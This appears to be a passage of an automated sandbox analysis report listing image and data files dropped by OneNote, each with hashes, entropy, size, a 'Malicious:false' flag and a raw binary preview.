                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):52912
                                                                                                        Entropy (8bit):7.679147474806877
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                        MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                        SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                        SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                        SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1717
                                                                                                        Entropy (8bit):7.154087739587035
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                        MD5:943371B39CA847674998535110462220
                                                                                                        SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                        SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                        SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12824
                                                                                                        Entropy (8bit):7.974776104184905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                        MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                        SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                        SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                        SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4744
                                                                                                        Entropy (8bit):0.700662992436289
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:5YJheYyfh3h1+SXGXUnfnlbloOHKSdCFTqzFTurRuj8lvClax/2r8FTuxRujd:qWYyfdaUfvoOFEEzAlV/x/2r8A8
                                                                                                        MD5:4DA87E38390A957EBD9150FA47CAA625
                                                                                                        SHA1:9E4A5EAAC9CD8F086D125873A2C78B12334E924E
                                                                                                        SHA-256:A3F85C62EC92E22AF4A3F84D1A7921C2DABA28F2EEBA6E5069B2B876ECF9334D
                                                                                                        SHA-512:12F3F1CC4712FDDBBA8865902F124CF60EDF65ACF7A484BA2B7EF0CAD5E5D6E01C9A586562BB3D26397084A1DAA55AF281F7B373B4F9A0FD55E8E164AA731AFE
                                                                                                        Malicious:false
                                                                                                        Preview:.R\{..M..Sx.)...^.,.EG..*..._^................?.....I.......*...*...*...*....................................................B.7p..I. ...x.00.......................h................................................w.J..j.).u4...........#)H.L...c.\.%.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
